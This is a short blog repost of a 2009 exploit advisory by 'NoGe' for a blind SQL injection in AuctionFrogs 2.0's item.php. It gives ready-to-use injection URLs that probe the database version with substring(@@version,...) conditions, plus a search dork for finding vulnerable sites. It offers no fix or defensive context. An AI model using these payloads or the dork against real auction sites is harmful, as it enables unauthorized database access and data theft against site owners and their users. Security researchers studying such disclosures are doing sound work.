Home vulnerabilities AuctionFrogs 2.0 SQL Injection Vuln

AuctionFrogs 2.0 SQL Injection Vuln

By
Tuesday, April 21, 2009
Read
Add Comment

[o] AuctionFrgos 2.0 Blind SQL Injection Vulnerability
Software : AuctionFrogs version 2.0
Vendor   : http://auctionfrogs.org/
Author   : NoGe


[o] Vulnerable file
item.php


[o] Exploit
http://localhost/[path]/item.php?id=[SQL]
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by the Auctionfrogs"


[o] Note
this a private script and all target is in one host


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us